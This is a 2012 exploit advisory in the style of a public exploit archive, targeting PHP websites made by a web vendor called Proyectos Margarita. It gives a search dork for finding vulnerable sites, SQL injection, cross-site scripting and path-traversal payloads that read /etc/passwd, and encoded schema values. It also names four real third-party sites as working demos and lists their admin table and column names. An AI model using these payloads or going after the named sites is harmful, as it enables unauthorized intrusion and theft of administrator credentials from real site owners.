_    _ _____   ___  ____   ___  _____   _____   __
 | |  | |  __ \ / _ \|  _ \ / _ \|  __ \ / _ \ \ / /
 | |  | | |__) | | | | |_) | | | | |__) | | | \ V / 
 | |  | |  _  /| | | |  _ <| | | |  _  /| | | |> <  
 | |__| | | \ \| |_| | |_) | |_| | | \ \| |_| / . \ 
  \____/|_|  \_\\___/|____/ \___/|_|  \_\\___/_/ \_\

               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email:  ur0b0r0x_4n1@live.com
# Line:   GreyHat


# Exploit Title: Proyectos Margarita - SQL Injection / Local File Inclusion Vulnerabilities
# Dork: intext:" Desarrollado por Proyectos Margarita Joven "t
# Date: 06/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.margaritajoven.com/
# Vendor Name: Proyectos Margarita
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[02/11/2012] - Vulnerability discovered
[05/11/2012] - Vendor notified Dont responsed
[06/11/2012] - Public disclosure 
--------------------------------------------------

# Expl0it/P0c ###################
http://site.com/*.*=  < Sql Vulnerability Path >
http://site.com/*.*=  < LFi Vulnerability Path >
 

# Exploit/Comand/Sql=> +union+select+1,2,3,4--+
# Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>  
# Exploit/Comand/Lfi=> /../../../../../../../etc/passwd%00/../../../
# Payload/Comand/Sql=> table_schema=0x44F6277C616672756743789032 / table_name=0x5E6536C6574696541179

# Demo_Xss_Sql_Vulnerabilities
http://www.distribuidorapadron.com/productos.php?cod_cat=1'
http://rosaliatours.com/traslados.php?idioma=1'
http://www.lindamarcano.com/detalles.php?ide=1'
http://www.cajo.com.ve/evento.php?ide=1'

# The Same Tables And Columns All Site Vulnerability
[o] Data_Bae [o]
+----------------+
- admin
- categorias
- eventos
- productos
- suscripciones
+----------------+
[o] Admin_Tables [o]
+----------------+
- login
- pass
- usuario
+----------------+

# Gr3t'x #########################
>> | Mr.Pack | Nick Nitrous  | Revolution_Hackers | Dylan Irzi | R00tc0d3r's |  SecurityDev | Mafia Dz | Algerian Hacker |
>> And All H4x0r5